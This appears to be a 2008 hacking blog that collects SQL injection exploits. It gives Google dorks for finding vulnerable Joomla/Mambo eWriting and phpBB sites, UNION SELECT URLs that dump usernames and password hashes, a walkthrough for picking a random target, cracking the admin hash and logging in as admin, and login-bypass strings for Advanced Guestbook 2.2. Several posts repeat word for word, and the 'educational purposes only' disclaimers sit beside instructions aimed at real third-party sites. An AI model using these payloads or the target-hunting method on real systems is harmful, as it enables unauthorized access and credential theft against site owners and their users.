eWriting 1.2.1 - SQL injection
Dorks:
"Powered by eWriting 1.2.1
allinurl:"com_ewriting"
Joomla!
/index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users--
Mambo
/index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+mos_users--
All credit goes to the original author
Source: http://hacking.isgreat.org/community/showthread.php?t=1015
Note: This is for educational purposes only, don't cause harm to anyone using this exploit
Enjoy!
Sunday, March 16, 2008
Saturday, March 15, 2008
Phpbb hacking with pictures
Phpbb hacking with pictures
I already posted a step by step video for this hack
the video is located @ [quote]http://rapidshare.com/files/99460220/phpbb-Sql-Injection.rar.html[/quote]
Well get back to work
What we need for this hack to work:
1: A pc with internet connection
2: our friend (Google)
3: The sql injection code
4. And finally the target.
lets do it step by step:
open up google and type "Modified by Fully Modded" in search bar.
it will give many results, select any one randomly.
this is what you most likely be getting after you search for the above string.
Just have a look at the target
now we have the target, its time to inject our target now:
for injection we use the following string :
[code]http://site.com/forum/kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1[/code]Now from the above string [replace the site.com/forum/] with you target site and forum path
Hit enter and wait for the page to load fully
Well this sql injection will give you the admins username along with the hash
now you need to break the hash in order to login as admin
To break the hash use
http://www.milw0rm.com/cracker/insert.php
enter the hash their and click on submit and it will give you the password
All credit goes to the original author
Source: http://hacking.isgreat.org/community/showthread.php?t=1015
Note: This is for educational purposes only, don't cause harm to anyone using this exploit
Enjoy!
I already posted a step by step video for this hack
the video is located @ [quote]http://rapidshare.com/files/99460220/phpbb-Sql-Injection.rar.html[/quote]
Well get back to work
What we need for this hack to work:
1: A pc with internet connection
2: our friend (Google)
3: The sql injection code
4. And finally the target.
lets do it step by step:
open up google and type "Modified by Fully Modded" in search bar.
it will give many results, select any one randomly.
this is what you most likely be getting after you search for the above string.
Just have a look at the target
now we have the target, its time to inject our target now:
for injection we use the following string :
[code]http://site.com/forum/kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char(58),user_password),4,5,6,7,8,9,10,11,12,13+from+phpbb_users+where+user_id+=2&page_num=2&cat=1[/code]Now from the above string [replace the site.com/forum/] with you target site and forum path
Hit enter and wait for the page to load fully
Well this sql injection will give you the admins username along with the hash
now you need to break the hash in order to login as admin
To break the hash use
http://www.milw0rm.com/cracker/insert.php
enter the hash their and click on submit and it will give you the password
All credit goes to the original author
Source: http://hacking.isgreat.org/community/showthread.php?t=1015
Note: This is for educational purposes only, don't cause harm to anyone using this exploit
Enjoy!
Friday, February 8, 2008
advanced guestbook vulnerability
its not a new vulnerability in "advanced guestbook"
but i am posting it here because still no patch is issued for fixing it.
as per bugtraq,
It has been reported that Advanced Guestbook is prone to a SQL injection vulnerability that could allow an attacker to gain administrative access to the application.
This issue is reported to exist in Advanced Guestbook 2.2, however, it is possible that other versions are affected as well.
The following proof of concept exploits have been provided:
JQ explains that it is possible to trigger this issue by leaving the username entry blank and entering the following string in the password field:
') OR ('a' = 'a
Spy Hat comments that it is also possible to leverage this issue by leaving the password field blank and entering the following string into the username field:
? or 1=1 --
For laymen:
in simple terms,
Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access.
proof of concept can be found by googling for "intitle:guestbook "advanced guestbook 2.2 powered""
this google query shows results for websites with "Advanced Guestbook v2.2" installed an attacker can select any of the results, and use this sql injection to gain unauthorized access.
it is strongly recommended to change the name/location of www.example.com/guestbook/admin.php"
also, This vulnerability is reportedly fixed in version 2.3.1.
update your version immediately if you are still running the old version.
but i am posting it here because still no patch is issued for fixing it.
as per bugtraq,
It has been reported that Advanced Guestbook is prone to a SQL injection vulnerability that could allow an attacker to gain administrative access to the application.
This issue is reported to exist in Advanced Guestbook 2.2, however, it is possible that other versions are affected as well.
The following proof of concept exploits have been provided:
JQ
') OR ('a' = 'a
Spy Hat
? or 1=1 --
For laymen:
in simple terms,
Advanced Guestbook v2.2 has an SQL injection problem which allows unauthorized access.
proof of concept can be found by googling for "intitle:guestbook "advanced guestbook 2.2 powered""
this google query shows results for websites with "Advanced Guestbook v2.2" installed an attacker can select any of the results, and use this sql injection to gain unauthorized access.
it is strongly recommended to change the name/location of www.example.com/guestbook/admin.php"
also, This vulnerability is reportedly fixed in version 2.3.1.
update your version immediately if you are still running the old version.
My First Post
Hi,
This is my first post on "Latest Exploits and Vulnerabilities"
I named this blog while keeping in mind the meaning of the words used.
I will try to update this blog with the latest exploits and vulnerabilities.
If you like the content of this blog, you can also visit my website located at:
http://hacking.isgreat.org
Thank you for visiting this blog.
This is my first post on "Latest Exploits and Vulnerabilities"
I named this blog while keeping in mind the meaning of the words used.
I will try to update this blog with the latest exploits and vulnerabilities.
If you like the content of this blog, you can also visit my website located at:
http://hacking.isgreat.org
Thank you for visiting this blog.
Subscribe to:
Posts (Atom)